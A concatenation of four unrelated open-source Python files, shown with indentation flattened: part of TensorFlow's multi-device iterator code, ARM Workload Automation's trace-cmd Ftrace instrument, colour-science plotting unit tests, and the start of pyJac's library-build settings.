# this op runs after all the iterators are deleted.
if self._eager_mode:
with context.eager_mode():
gen_dataset_ops.delete_multi_device_iterator(
multi_device_iterator=self._multi_device_iterator,
iterators=self._iterators,
deleter=self._deleter)
else:
with context.graph_mode():
gen_dataset_ops.delete_multi_device_iterator(
multi_device_iterator=self._multi_device_iterator,
iterators=self._iterators,
deleter=self._deleter)
class MultiDeviceIteratorSpec(type_spec.TypeSpec):
"""Type specification for `OwnedMultiDeviceIterator`."""
__slots__ = ["_devices", "_source_device", "_element_spec"]
def __init__(self, devices, source_device, element_spec):
self._devices = devices
self._source_device = source_device
self._element_spec = element_spec
@property
def value_type(self):
return OwnedMultiDeviceIterator
def _serialize(self):
return (tuple(self._devices), self._source_device, self._element_spec)
@property
def _component_specs(self):
specs = [
tensor_spec.TensorSpec([], dtypes.resource),
tensor_spec.TensorSpec([], dtypes.variant)
]
for _ in range(len(self._devices)):
specs.append(iterator_ops.IteratorSpec(self._element_spec))
return specs
def _to_components(self, value):
# pylint: disable=protected-access
c = [value._multi_device_iterator_resource, value._deleter]
c.extend(value._device_iterators)
return c
def _from_components(self, components):
return OwnedMultiDeviceIterator(
dataset=None,
devices=self._devices,
source_device=self._source_device,
components=components,
element_spec=self._element_spec)
@staticmethod
def from_value(value):
# pylint: disable=protected-access
return MultiDeviceIteratorSpec(
value._devices,
value._source_device,
value.element_spec)
class OwnedMultiDeviceIterator(composite_tensor.CompositeTensor):
"""An iterator over multiple devices.
The multi-device iterator resource created through `OwnedMultiDeviceIterator`
is owned by the Python object and the life time of the underlying resource is
tied to the life time of the `OwnedMultiDeviceIterator` object. This makes
`OwnedMultiDeviceIterator` appropriate for use in eager mode and inside of
tf.functions.
"""
def __init__(self,
dataset=None,
devices=None,
max_buffer_size=1,
prefetch_buffer_size=1,
source_device="/cpu:0",
components=None,
element_spec=None):
"""Constructs an owned MultiDeviceIterator object.
Args:
dataset: The input dataset to be iterated over.
devices: The list of devices to fetch data to.
max_buffer_size: Maximum size of the host side per device buffer to keep.
prefetch_buffer_size: if > 0, then we setup a buffer on each device to
prefetch into.
source_device: The host device to place the `dataset` on. In order to
prevent deadlocks, if the prefetch_buffer_size is greater than the
max_buffer_size, we set the max_buffer_size to prefetch_buffer_size.
components: Tensor components to construct the MultiDeviceIterator from.
element_spec: A nested structure of `TypeSpec` objects that
represents the type specification of elements of the iterator.
Raises:
RuntimeError: If executed in graph mode or outside of function building
mode.
"""
if not context.executing_eagerly() and not ops.inside_function():
raise RuntimeError("OwnedMultiDeviceIterator is only supported inside of "
"tf.function or when eager execution is enabled.")
if devices is None:
raise ValueError("`devices` must be provided")
error_message = "Either `dataset` or both `components` and "
"`element_spec` need to be provided."
if dataset is None:
if (components is None or element_spec is None):
raise ValueError(error_message)
self._element_spec = element_spec
self._devices = devices
self._source_device = source_device
self._multi_device_iterator_resource = components[0]
self._deleter = components[1]
self._device_iterators = components[2:]
iterator_handles = []
for it in self._device_iterators:
iterator_handles.append(it._iterator_resource) # pylint: disable=protected-access
else:
if (components is not None or element_spec is not None):
raise ValueError(error_message)
options = dataset_ops.Options()
options.experimental_distribute.num_devices = len(devices)
dataset = dataset.with_options(options)
dataset = dataset._apply_options() # pylint: disable=protected-access
self._element_spec = dataset.element_spec
experimental_slack = dataset.options().experimental_slack
self._devices = devices
self._source_device = source_device
source_device_tensor = ops.convert_to_tensor(self._source_device)
if prefetch_buffer_size > max_buffer_size:
max_buffer_size = prefetch_buffer_size
# Create the MultiDeviceIterator.
with ops.device(self._source_device):
self._multi_device_iterator_resource, self._deleter = (
gen_dataset_ops.anonymous_multi_device_iterator(
devices=self._devices, **dataset._flat_structure)) # pylint: disable=protected-access
# The incarnation ID is used to ensure consistency between the
# per-device iterators and the multi-device iterator.
incarnation_id = gen_dataset_ops.multi_device_iterator_init(
dataset._variant_tensor, # pylint: disable=protected-access
self._multi_device_iterator_resource,
max_buffer_size=max_buffer_size)
prototype_device_datasets = []
for i, device in enumerate(self._devices):
with ops.device(device):
ds = _PerDeviceGenerator(i, self._multi_device_iterator_resource,
incarnation_id, source_device_tensor,
dataset.element_spec)
prototype_device_datasets.append(ds)
# TODO(rohanj): Explore the possibility of the MultiDeviceIterator to
# initialize the device side of the pipeline. This would allow the
# MultiDeviceIterator to choose, for example, to move some transformations
# into the device side from its input. It might be useful in rewriting.
# Create the per device iterators.
self._device_iterators = []
iterator_handles = []
for i, device in enumerate(self._devices):
with ops.device(device):
ds = _create_device_dataset(prototype_device_datasets[i],
incarnation_id, prefetch_buffer_size,
experimental_slack)
iterator = iter(ds)
self._device_iterators.append(iterator)
iterator_handles.append(iterator._iterator_resource) # pylint: disable=protected-access
self._resource_deleter = MultiDeviceIteratorResourceDeleter(
multi_device_iterator=self._multi_device_iterator_resource,
iterators=iterator_handles,
device=self._source_device,
deleter=self._deleter)
def get_next(self, device=None):
"""Returns the next element given a `device`, else returns all in a list."""
if device is not None:
index = self._devices.index(device)
return self._device_iterators[index].get_next()
result = []
for i, device in enumerate(self._devices):
with ops.device(device):
result.append(self._device_iterators[i].get_next())
return result
def __iter__(self):
return self
def next(self):
return self.__next__()
def __next__(self):
try:
return self.get_next()
except errors.OutOfRangeError:
raise StopIteration
def get_next_as_optional(self):
result = []
for i, device in enumerate(self._devices):
with ops.device(device):
result.append(self._device_iterators[i].get_next_as_optional())
return result
@property
def element_spec(self):
return self._element_spec
@property
def _type_spec(self):
return MultiDeviceIteratorSpec(self._devices, self._source_device,
self._element_spec)
|
|
# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=W0613,E1101
from __future__ import division
import os
import time
import subprocess
from collections import defaultdict
from wlauto import Instrument, Parameter, Executable
from wlauto.exceptions import InstrumentError, ConfigError
from wlauto.core import signal
from wlauto.utils.types import boolean
OUTPUT_TRACE_FILE = 'trace.dat'
OUTPUT_TEXT_FILE = '{}.txt'.format(os.path.splitext(OUTPUT_TRACE_FILE)[0])
TIMEOUT = 180
class TraceCmdInstrument(Instrument):
name = 'trace-cmd'
description = """
trace-cmd is an instrument which interacts with Ftrace Linux kernel internal
tracer
From trace-cmd man page:
trace-cmd command interacts with the Ftrace tracer that is built inside the
Linux kernel. It interfaces with the Ftrace specific files found in the
debugfs file system under the tracing directory.
trace-cmd reads a list of events it will trace, which can be specified in
the config file as follows ::
trace_events = ['irq*', 'power*']
If no event is specified in the config file, trace-cmd traces the following events:
- sched*
- irq*
- power*
- cpufreq_interactive*
The list of available events can be obtained by rooting and running the following
command line on the device ::
trace-cmd list
You may also specify ``trace_buffer_size`` setting which must be an integer that will
be used to set the ftrace buffer size. It will be interpreted as KB::
trace_cmd_buffer_size = 8000
The maximum buffer size varies from device to device, but there is a maximum and trying
to set buffer size beyound that will fail. If you plan on collecting a lot of trace over
long periods of time, the buffer size will not be enough and you will only get trace for
the last portion of your run. To deal with this you can set the ``trace_mode`` setting to
``'record'`` (the default is ``'start'``)::
trace_cmd_mode = 'record'
This will cause trace-cmd to trace into file(s) on disk, rather than the buffer, and so the
limit for the max size of the trace is set by the storage available on device. Bear in mind
that ``'record'`` mode *is* more instrusive than the default, so if you do not plan on
generating a lot of trace, it is best to use the default ``'start'`` mode.
.. note:: Mode names correspend to the underlying trace-cmd exectuable's command used to
implement them. You can find out more about what is happening in each case from
trace-cmd documentation: https://lwn.net/Articles/341902/.
This instrument comes with an Android trace-cmd binary that will be copied and used on the
device, however post-processing will be done on-host and you must have trace-cmd installed and
in your path. On Ubuntu systems, this may be done with::
sudo apt-get install trace-cmd
"""
parameters = [
Parameter('events', kind=list, default=['sched*', 'irq*', 'power*', 'cpufreq_interactive*'],
global_alias='trace_events',
description="""
Specifies the list of events to be traced. Each event in the list will be passed to
trace-cmd with -e parameter and must be in the format accepted by trace-cmd.
"""),
Parameter('mode', default='start', allowed_values=['start', 'record'],
global_alias='trace_mode',
description="""
Trace can be collected using either 'start' or 'record' trace-cmd
commands. In 'start' mode, trace will be collected into the ftrace buffer;
in 'record' mode, trace will be written into a file on the device's file
system. 'start' mode is (in theory) less intrusive than 'record' mode, however
it is limited by the size of the ftrace buffer (which is configurable --
see ``buffer_size`` -- but only up to a point) and that may overflow
for long-running workloads, which will result in dropped events.
"""),
Parameter('buffer_size', kind=int, default=None,
global_alias='trace_buffer_size',
description="""
Attempt to set ftrace buffer size to the specified value (in KB). Default buffer size
may need to be increased for long-running workloads, or if a large number
of events have been enabled. Note: there is a maximum size that the buffer can
be set, and that varies from device to device. Attempting to set buffer size higher
than this will fail. In that case, this instrument will set the size to the highest
possible value by going down from the specified size in ``buffer_size_step`` intervals.
"""),
Parameter('buffer_size_step', kind=int, default=1000,
global_alias='trace_buffer_size_step',
description="""
Defines the decremental step used if the specified ``buffer_size`` could not be set.
This will be subtracted form the buffer size until set succeeds or size is reduced to
1MB.
"""),
Parameter('buffer_size_file', default='/d/tracing/buffer_size_kb',
description="""
Path to the debugs file that may be used to set ftrace buffer size. This should need
to be modified for the vast majority devices.
"""),
Parameter('report', kind=boolean, default=True,
description="""
Specifies whether host-side reporting should be performed once the binary trace has been
pulled form the device.
.. note:: This requires the latest version of trace-cmd to be installed on the host (the
one in your distribution's repos may be too old).
"""),
Parameter('no_install', kind=boolean, default=False,
description="""
Do not install the bundled trace-cmd and use the one on the device instead. If there is
not already a trace-cmd on the device, an error is raised.
"""),
]
def __init__(self, device, **kwargs):
super(TraceCmdInstrument, self).__init__(device, **kwargs)
self.trace_cmd = None
self.event_string = _build_trace_events(self.events)
self.output_file = os.path.join(self.device.working_directory, OUTPUT_TRACE_FILE)
self.temp_trace_file = self.device.path.join(self.device.working_directory, OUTPUT_TRACE_FILE)
def on_run_init(self, context):
if not self.device.is_rooted:
raise InstrumentError('trace-cmd instrument cannot be used on an unrooted device.')
if not self.no_install:
host_file = context.resolver.get(Executable(self, self.device.abi, 'trace-cmd'))
self.trace_cmd = self.device.install_executable(host_file)
else:
if not self.device.is_installed('trace-cmd'):
raise ConfigError('No trace-cmd found on device and no_install=True is specified.')
self.trace_cmd = 'trace-cmd'
# Register ourselves as absolute last event before and
# first after so we can mark the trace at the right time
signal.connect(self.insert_start_mark, signal.BEFORE_WORKLOAD_EXECUTION, priority=11)
signal.connect(self.insert_end_mark, signal.AFTER_WORKLOAD_EXECUTION, priority=11)
def setup(self, context):
if self.mode == 'start':
if self.buffer_size:
self._set_buffer_size()
self.device.execute('{} reset'.format(self.trace_cmd), as_root=True, timeout=180)
elif self.mode == 'record':
pass
else:
raise ValueError('Bad mode: {}'.format(self.mode)) # should never get here
def start(self, context):
self.start_time = time.time() # pylint: disable=attribute-defined-outside-init
if self.mode == 'start':
self.device.execute('{} start {}'.format(self.trace_cmd, self.event_string), as_root=True)
elif self.mode == 'record':
self.device.kick_off('{} record -o {} {}'.format(self.trace_cmd, self.output_file, self.event_string))
else:
raise ValueError('Bad mode: {}'.format(self.mode)) # should never get here
def stop(self, context):
self.stop_time = time.time() # pylint: disable=attribute-defined-outside-init
if self.mode == 'start':
self.device.execute('{} stop'.format(self.trace_cmd), timeout=60, as_root=True)
elif self.mode == 'record':
# There will be a trace-cmd worker process per CPU core plus a main
# control trace-cmd process. Interrupting the control process will
# trigger the generation of the single binary trace file.
trace_cmds = self.device.ps(name=self.trace_cmd)
if not trace_cmds:
raise InstrumentError('Could not find running trace-cmd on device.')
# The workers will have their PPID set to the PID of control.
parent_map = defaultdict(list)
for entry in trace_cmds:
parent_map[entry.ppid].append(entry.pid)
controls = [v[0] for _, v in parent_map.iteritems()
if len(v) == 1 and v[0] in parent_map]
if len(controls) > 1:
self.logger.warning('More than one trace-cmd instance found; stopping all of them.')
for c in controls:
self.device.kill(c, signal='INT', as_root=True)
else:
raise ValueError('Bad mode: {}'.format(self.mode)) # should never get here
def update_result(self, context): # NOQA pylint: disable=R0912
if self.mode == 'start':
self.device.execute('{} extract -o {}'.format(self.trace_cmd, self.output_file),
timeout=TIMEOUT, as_root=True)
elif self.mode == 'record':
self.logger.debug('Waiting for trace.dat to be generated.')
while self.device.ps(name=self.trace_cmd):
time.sleep(2)
else:
raise ValueError('Bad mode: {}'.format(self.mode)) # should never get here
# The size of trace.dat will depend on how long trace-cmd was running.
# Therefore timout for the pull command must also be adjusted
# accordingly.
pull_timeout = (self.stop_time - self.start_time)
self.device.pull_file(self.output_file, context.output_directory, timeout=pull_timeout)
context.add_iteration_artifact('bintrace', OUTPUT_TRACE_FILE, kind='data',
description='trace-cmd generated ftrace dump.')
local_trace_file = os.path.join(context.output_directory, OUTPUT_TRACE_FILE)
local_txt_trace_file = os.path.join(context.output_directory, OUTPUT_TEXT_FILE)
if self.report:
# To get the output of trace.dat, trace-cmd must be installed
# This is done host-side because the generated file is very large
if not os.path.isfile(local_trace_file):
self.logger.warning('Not generating trace.txt, as trace.bin does not exist.')
try:
command = 'trace-cmd report {} > {}'.format(local_trace_file, local_txt_trace_file)
self.logger.debug(command)
process = subprocess.Popen(command, stderr=subprocess.PIPE, shell=True)
_, error = process.communicate()
if process.returncode:
raise InstrumentError('trace-cmd returned non-zero exit code {}'.format(process.returncode))
if error:
# logged at debug level, as trace-cmd always outputs some
# errors that seem benign.
self.logger.debug(error)
if os.path.isfile(local_txt_trace_file):
context.add_iteration_artifact('txttrace', OUTPUT_TEXT_FILE, kind='export',
description='trace-cmd generated ftrace dump.')
self.logger.debug('Verifying traces.')
with open(local_txt_trace_file) as fh:
for line in fh:
if 'EVENTS DROPPED' in line:
self.logger.warning('Dropped events detected.')
break
else:
self.logger.debug('Trace verified.')
else:
self.logger.warning('Could not generate trace.txt.')
except OSError:
raise InstrumentError('Could not find trace-cmd. Please make sure it is installed and is in PATH.')
def teardown(self, context):
self.device.delete_file(os.path.join(self.device.working_directory, OUTPUT_TRACE_FILE))
def on_run_end(self, context):
pass
def validate(self):
if self.report and os.system('which trace-cmd > /dev/null'):
raise InstrumentError('trace-cmd is not in PATH; is it installed?')
if self.buffer_size:
if self.mode == 'record':
self.logger.debug('trace_buffer_size specified with record mode; it will be ignored.')
else:
try:
int(self.buffer_size)
except ValueError:
raise ConfigError('trace_buffer_size must be an int.')
def insert_start_mark(self, context):
# trace marker appears in ftrace as an ftrace/print event with TRACE_MARKER_START in info field
self.device.set_sysfile_value("/sys/kernel/debug/tracing/trace_marker", "TRACE_MARKER_START", verify=False)
def insert_end_mark(self, context):
# trace marker appears in ftrace as an ftrace/print event with TRACE_MARKER_STOP in info field
self.device.set_sysfile_value("/sys/kernel/debug/tracing/trace_marker", "TRACE_MARKER_STOP", verify=False)
def _set_buffer_size(self):
target_buffer_size = self.buffer_size
attempt_buffer_size = target_buffer_size
buffer_size = 0
floor = 1000 if target_buffer_size > 1000 else target_buffer_size
while attempt_buffer_size >= floor:
self.device.set_sysfile_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.device.get_sysfile_value(self.buffer_size_file, kind=int)
if buffer_size == attempt_buffer_size:
break
else:
attempt_buffer_size -= self.buffer_size_step
if buffer_size == target_buffer_size:
return
while attempt_buffer_size < target_buffer_size:
attempt_buffer_size += self.buffer_size_step
self.device.set_sysfile_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.device.get_sysfile_value(self.buffer_size_file, kind=int)
if attempt_buffer_size != buffer_size:
self.logger.warning('Failed to set trace buffer size to {}, value set was {}'.format(target_buffer_size, buffer_size))
break
def _build_trace_events(events):
event_string = ' '.join(['-e {}'.format(e) for e in events])
return event_string
|
|
"""Defines the unit tests for the :mod:`colour.plotting.common` module."""
import matplotlib.pyplot as plt
import numpy as np
import os
import shutil
import tempfile
import unittest
from functools import partial
from matplotlib.pyplot import Axes, Figure
import colour
from colour.colorimetry import SDS_ILLUMINANTS
from colour.io import read_image
from colour.models import RGB_COLOURSPACES, XYZ_to_sRGB, gamma_function
from colour.plotting import ColourSwatch
from colour.plotting import (
colour_style,
override_style,
XYZ_to_plotting_colourspace,
colour_cycle,
artist,
camera,
render,
label_rectangles,
uniform_axes3d,
filter_passthrough,
filter_RGB_colourspaces,
filter_cmfs,
filter_illuminants,
filter_colour_checkers,
update_settings_collection,
plot_single_colour_swatch,
plot_multi_colour_swatches,
plot_single_function,
plot_multi_functions,
plot_image,
)
from colour.utilities import attest
__author__ = "Colour Developers"
__copyright__ = "Copyright 2013 Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"TestColourStyle",
"TestOverrideStyle",
"TestXyzToPlottingColourspace",
"TestColourCycle",
"TestArtist",
"TestCamera",
"TestRender",
"TestLabelRectangles",
"TestUniformAxes3d",
"TestFilterPassthrough",
"TestFilterRgbColourspaces",
"TestFilterCmfs",
"TestFilterIlluminants",
"TestFilterColourCheckers",
"TestUpdateSettingsCollection",
"TestPlotSingleColourSwatch",
"TestPlotMultiColourSwatches",
"TestPlotSingleFunction",
"TestPlotMultiFunctions",
"TestPlotImage",
]
class TestColourStyle(unittest.TestCase):
"""
Define :func:`colour.plotting.common.colour_style` definition unit tests
methods.
"""
def test_colour_style(self):
"""Test :func:`colour.plotting.common.colour_style` definition."""
self.assertIsInstance(colour_style(use_style=False), dict)
class TestOverrideStyle(unittest.TestCase):
"""
Define :func:`colour.plotting.common.override_style` definition unit tests
methods.
"""
def test_override_style(self):
"""Test :func:`colour.plotting.common.override_style` definition."""
text_color = plt.rcParams["text.color"]
try:
@override_style(**{"text.color": "red"})
def test_text_color_override():
"""Test :func:`colour.plotting.common.override_style` definition."""
attest(plt.rcParams["text.color"] == "red")
test_text_color_override()
finally:
plt.rcParams["text.color"] = text_color
class TestXyzToPlottingColourspace(unittest.TestCase):
"""
Define :func:`colour.plotting.common.XYZ_to_plotting_colourspace`
definition unit tests methods.
"""
def test_XYZ_to_plotting_colourspace(self):
"""
Test :func:`colour.plotting.common.XYZ_to_plotting_colourspace`
definition.
"""
XYZ = np.random.random(3)
np.testing.assert_almost_equal(
XYZ_to_sRGB(XYZ), XYZ_to_plotting_colourspace(XYZ), decimal=7
)
class TestColourCycle(unittest.TestCase):
"""
Define :func:`colour.plotting.common.colour_cycle` definition unit tests
methods.
"""
def test_colour_cycle(self):
"""Test :func:`colour.plotting.common.colour_cycle` definition."""
cycler = colour_cycle()
np.testing.assert_almost_equal(
next(cycler),
np.array([0.95686275, 0.26274510, 0.21176471, 1.00000000]),
decimal=7,
)
np.testing.assert_almost_equal(
next(cycler),
np.array([0.61582468, 0.15423299, 0.68456747, 1.00000000]),
decimal=7,
)
np.testing.assert_almost_equal(
next(cycler),
np.array([0.25564014, 0.31377163, 0.70934256, 1.00000000]),
decimal=7,
)
cycler = colour_cycle(colour_cycle_map="viridis")
np.testing.assert_almost_equal(
next(cycler),
np.array([0.26700400, 0.00487400, 0.32941500, 1.00000000]),
decimal=7,
)
class TestArtist(unittest.TestCase):
"""
Define :func:`colour.plotting.common.artist` definition unit tests
methods.
"""
def test_artist(self):
"""Test :func:`colour.plotting.common.artist` definition."""
figure_1, axes_1 = artist()
self.assertIsInstance(figure_1, Figure)
self.assertIsInstance(axes_1, Axes)
_figure_2, axes_2 = artist(axes=axes_1, uniform=True)
self.assertIs(axes_1, axes_2)
figure_3, _axes_3 = artist(uniform=True)
self.assertEqual(figure_3.get_figwidth(), figure_3.get_figheight())
class TestCamera(unittest.TestCase):
"""
Define :func:`colour.plotting.common.camera` definition unit tests
methods.
"""
def test_camera(self):
"""Test :func:`colour.plotting.common.camera` definition."""
figure, _axes = artist()
axes = figure.add_subplot(111, projection="3d")
_figure, axes = camera(axes=axes, elevation=45, azimuth=90)
self.assertEqual(axes.elev, 45)
self.assertEqual(axes.azim, 90)
class TestRender(unittest.TestCase):
"""
Define :func:`colour.plotting.common.render` definition unit tests
methods.
"""
def setUp(self):
"""Initialise the common tests attributes."""
self._temporary_directory = tempfile.mkdtemp()
def tearDown(self):
"""After tests actions."""
shutil.rmtree(self._temporary_directory)
def test_render(self):
"""Test :func:`colour.plotting.common.render` definition."""
figure, axes = artist()
render(
figure=figure,
axes=axes,
standalone=False,
aspect="equal",
axes_visible=True,
bounding_box=[0, 1, 0, 1],
tight_layout=False,
legend=True,
legend_columns=2,
transparent_background=False,
title="Render Unit Test",
wrap_title=True,
x_label="x Label",
y_label="y Label",
x_ticker=False,
y_ticker=False,
)
render(standalone=True)
render(
filename=os.path.join(self._temporary_directory, "render.png"),
axes_visible=False,
)
class TestLabelRectangles(unittest.TestCase):
"""
Define :func:`colour.plotting.common.label_rectangles` definition unit
tests methods.
"""
def test_label_rectangles(self):
"""Test :func:`colour.plotting.common.label_rectangles` definition."""
figure, axes = artist()
samples = np.linspace(0, 1, 10)
_figure, axes = label_rectangles(
samples, axes.bar(samples, 1), figure=figure, axes=axes
)
self.assertEqual(len(axes.texts), len(samples))
class TestUniformAxes3d(unittest.TestCase):
"""
Define :func:`colour.plotting.common.uniform_axes3d` definition unit tests
methods.
"""
def test_uniform_axes3d(self):
"""Test :func:`colour.plotting.common.uniform_axes3d` definition."""
figure, _axes = artist()
axes = figure.add_subplot(111, projection="3d")
uniform_axes3d(axes=axes)
self.assertEqual(axes.get_xlim(), axes.get_ylim())
self.assertEqual(axes.get_xlim(), axes.get_zlim())
class TestFilterPassthrough(unittest.TestCase):
"""
Define :func:`colour.plotting.common.filter_passthrough` definition unit
tests methods.
"""
def test_filter_passthrough(self):
"""Test :func:`colour.plotting.common.filter_passthrough` definition."""
self.assertListEqual(
sorted(
colourspace.name
for colourspace in filter_passthrough(
RGB_COLOURSPACES, ["^ACES.*"]
).values()
),
["ACES2065-1", "ACEScc", "ACEScct", "ACEScg", "ACESproxy"],
)
self.assertListEqual(
sorted(filter_passthrough(RGB_COLOURSPACES, ["^ACEScc$"]).keys()),
["ACEScc"],
)
self.assertListEqual(
sorted(filter_passthrough(RGB_COLOURSPACES, ["^acescc$"]).keys()),
["ACEScc"],
)
self.assertDictEqual(
filter_passthrough(
SDS_ILLUMINANTS,
[SDS_ILLUMINANTS["D65"], {"Is": "Excluded"}],
allow_non_siblings=False,
),
{"D65": SDS_ILLUMINANTS["D65"]},
)
self.assertDictEqual(
filter_passthrough(
SDS_ILLUMINANTS,
[SDS_ILLUMINANTS["D65"], {"Is": "Included"}],
allow_non_siblings=True,
),
{"D65": SDS_ILLUMINANTS["D65"], "Is": "Included"},
)
self.assertListEqual(
sorted(
element
for element in filter_passthrough(
{"John": "Doe", "Luke": "Skywalker"}, ["John"]
).values()
),
["Doe", "John"],
)
class TestFilterRgbColourspaces(unittest.TestCase):
"""
Define :func:`colour.plotting.common.filter_RGB_colourspaces` definition
unit tests methods.
"""
def test_filter_RGB_colourspaces(self):
"""
Test :func:`colour.plotting.common.filter_RGB_colourspaces`
definition.
"""
self.assertListEqual(
sorted(
colourspace.name
for colourspace in filter_RGB_colourspaces(
["^ACES.*"]
).values()
),
["ACES2065-1", "ACEScc", "ACEScct", "ACEScg", "ACESproxy"],
)
class TestFilterCmfs(unittest.TestCase):
"""
Define :func:`colour.plotting.common.filter_cmfs` definition unit tests
methods.
"""
def test_filter_cmfs(self):
"""Test :func:`colour.plotting.common.filter_cmfs` definition."""
self.assertListEqual(
sorted(
cmfs.name for cmfs in filter_cmfs([".*2 Degree.*"]).values()
),
[
"CIE 1931 2 Degree Standard Observer",
"CIE 2012 2 Degree Standard Observer",
"Stiles & Burch 1955 2 Degree RGB CMFs",
"Stockman & Sharpe 2 Degree Cone Fundamentals",
"Wright & Guild 1931 2 Degree RGB CMFs",
],
)
class TestFilterIlluminants(unittest.TestCase):
"""
Define :func:`colour.plotting.common.filter_illuminants` definition unit
tests methods.
"""
def test_filter_illuminants(self):
"""Test :func:`colour.plotting.common.filter_illuminants` definition."""
self.assertListEqual(
sorted(filter_illuminants(["^D.*"]).keys()),
["D50", "D55", "D60", "D65", "D75", "Daylight FL"],
)
class TestFilterColourCheckers(unittest.TestCase):
"""
Define :func:`colour.plotting.common.filter_colour_checkers` definition
unit tests methods.
"""
def test_filter_colour_checkers(self):
"""Test :func:`colour.plotting.common.filter_colour_checkers` definition."""
self.assertListEqual(
sorted(
colour_checker.name
for colour_checker in filter_colour_checkers(
[".*24.*"]
).values()
),
[
"ColorChecker24 - After November 2014",
"ColorChecker24 - Before November 2014",
],
)
class TestUpdateSettingsCollection(unittest.TestCase):
"""
Define :func:`colour.plotting.common.update_settings_collection`
definition unit tests methods.
"""
def test_update_settings_collection(self):
"""
Test :func:`colour.plotting.common.update_settings_collection`
definition.
"""
settings_collection = [{1: 2}, {3: 4}]
keyword_arguments = {5: 6}
update_settings_collection(settings_collection, keyword_arguments, 2)
self.assertListEqual(settings_collection, [{1: 2, 5: 6}, {3: 4, 5: 6}])
settings_collection = [{1: 2}, {3: 4}]
keyword_arguments = [{5: 6}, {7: 8}]
update_settings_collection(settings_collection, keyword_arguments, 2)
self.assertListEqual(settings_collection, [{1: 2, 5: 6}, {3: 4, 7: 8}])
class TestPlotSingleColourSwatch(unittest.TestCase):
"""
Define :func:`colour.plotting.common.plot_single_colour_swatch` definition
unit tests methods.
"""
def test_plot_single_colour_swatch(self):
"""
Test :func:`colour.plotting.common.plot_single_colour_swatch`
definition.
"""
figure, axes = plot_single_colour_swatch(
ColourSwatch((0.45620519, 0.03081071, 0.04091952))
)
self.assertIsInstance(figure, Figure)
self.assertIsInstance(axes, Axes)
figure, axes = plot_single_colour_swatch(
np.array([0.45620519, 0.03081071, 0.04091952])
)
self.assertIsInstance(figure, Figure)
self.assertIsInstance(axes, Axes)
class TestPlotMultiColourSwatches(unittest.TestCase):
"""
Define :func:`colour.plotting.common.plot_multi_colour_swatches`
definition unit tests methods.
"""
def test_plot_multi_colour_swatches(self):
"""
Test :func:`colour.plotting.common.plot_multi_colour_swatches`
definition.
"""
figure, axes = plot_multi_colour_swatches(
[
ColourSwatch((0.45293517, 0.31732158, 0.26414773)),
ColourSwatch((0.77875824, 0.57726450, 0.50453169)),
]
)
self.assertIsInstance(figure, Figure)
self.assertIsInstance(axes, Axes)
figure, axes = plot_multi_colour_swatches(
np.array(
[
[0.45293517, 0.31732158, 0.26414773],
[0.77875824, 0.57726450, 0.50453169],
]
),
direction="-y",
)
self.assertIsInstance(figure, Figure)
self.assertIsInstance(axes, Axes)
class TestPlotSingleFunction(unittest.TestCase):
"""
Define :func:`colour.plotting.common.plot_single_function` definition unit
tests methods.
"""
def test_plot_single_function(self):
"""Test :func:`colour.plotting.common.plot_single_function` definition."""
figure, axes = plot_single_function(
partial(gamma_function, exponent=1 / 2.2)
)
self.assertIsInstance(figure, Figure)
self.assertIsInstance(axes, Axes)
class TestPlotMultiFunctions(unittest.TestCase):
"""
Define :func:`colour.plotting.common.plot_multi_functions` definition unit
tests methods.
"""
def test_plot_multi_functions(self):
"""Test :func:`colour.plotting.common.plot_multi_functions` definition."""
functions = {
"Gamma 2.2": lambda x: x ** (1 / 2.2),
"Gamma 2.4": lambda x: x ** (1 / 2.4),
"Gamma 2.6": lambda x: x ** (1 / 2.6),
}
plot_kwargs = {"c": "r"}
figure, axes = plot_multi_functions(functions, plot_kwargs=plot_kwargs)
self.assertIsInstance(figure, Figure)
self.assertIsInstance(axes, Axes)
plot_kwargs = [{"c": "r"}, {"c": "g"}, {"c": "b"}]
figure, axes = plot_multi_functions(
functions, log_x=10, log_y=10, plot_kwargs=plot_kwargs
)
self.assertIsInstance(figure, Figure)
self.assertIsInstance(axes, Axes)
figure, axes = plot_multi_functions(functions, log_x=10)
self.assertIsInstance(figure, Figure)
self.assertIsInstance(axes, Axes)
figure, axes = plot_multi_functions(functions, log_y=10)
self.assertIsInstance(figure, Figure)
self.assertIsInstance(axes, Axes)
class TestPlotImage(unittest.TestCase):
"""
Define :func:`colour.plotting.common.plot_image` definition unit tests
methods.
"""
def test_plot_image(self):
"""Test :func:`colour.plotting.common.plot_image` definition."""
path = os.path.join(
colour.__path__[0], "..", "docs", "_static", "Logo_Medium_001.png"
)
# Distribution does not ship the documentation thus we are skipping
# this unit test if the image does not exist.
if not os.path.exists(path): # pragma: no cover
return
figure, axes = plot_image(read_image(path))
self.assertIsInstance(figure, Figure)
self.assertIsInstance(axes, Axes)
if __name__ == "__main__":
unittest.main()
|
|
"""Module used to create a shared/static library from pyJac files.
"""
from __future__ import print_function
import shutil
import re
import os
import subprocess
import sys
import multiprocessing
import platform
from .. import utils
def lib_ext(shared):
"""Returns the appropriate library extension based on the shared flag"""
return '.a' if not shared else '.so'
cmd_compile = dict(c='gcc',
icc='icc',
cuda='nvcc'
)
def cmd_lib(lang, shared):
"""Returns the appropriate compilation command for creation of the library based on the
language and shared flag"""
if lang == 'c':
return ['ar', 'rcs'] if not shared else ['gcc', '-shared']
elif lang == 'cuda':
return ['nvcc', '-lib'] if not shared else ['nvcc', '-shared']
elif lang == 'icc':
return ['ar', 'rcs'] if not shared else ['icc', '-shared']
includes = dict(c=['/usr/local/include/'], icc=['/usr/local/include/'],
cuda=['/usr/local/cuda/include/',
'/usr/local/cuda/samples/common/inc/'
]
)
flags = dict(c=['-std=c99', '-O3', '-mtune=native'],
icc=['-std=c99', '-O3', '-xhost', '-fp-model', 'precise', '-ipo'],
cuda=['-O3', '-arch=sm_20']
)
shared_flags = dict(c=['-fPIC'],
icc=['-fPIC'],
cuda=['-Xcompiler', '"-fPIC"']
)
